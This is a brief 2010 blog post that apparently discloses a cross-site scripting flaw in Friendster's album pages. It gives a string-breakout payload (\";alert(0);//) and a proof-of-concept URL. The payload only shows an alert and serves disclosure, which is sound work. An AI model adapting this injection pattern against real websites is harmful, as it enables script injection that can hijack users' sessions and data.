Data submitted via album description and a few other fields is not properly escaped before being rendered into javascript.
Exploit: \";alert(0);//
PoC: http://www.friendster.com/viewalbums.php?uid=120927091
Sunday, May 2, 2010
Subscribe to:
Post Comments (Atom)
No comments:
Post a Comment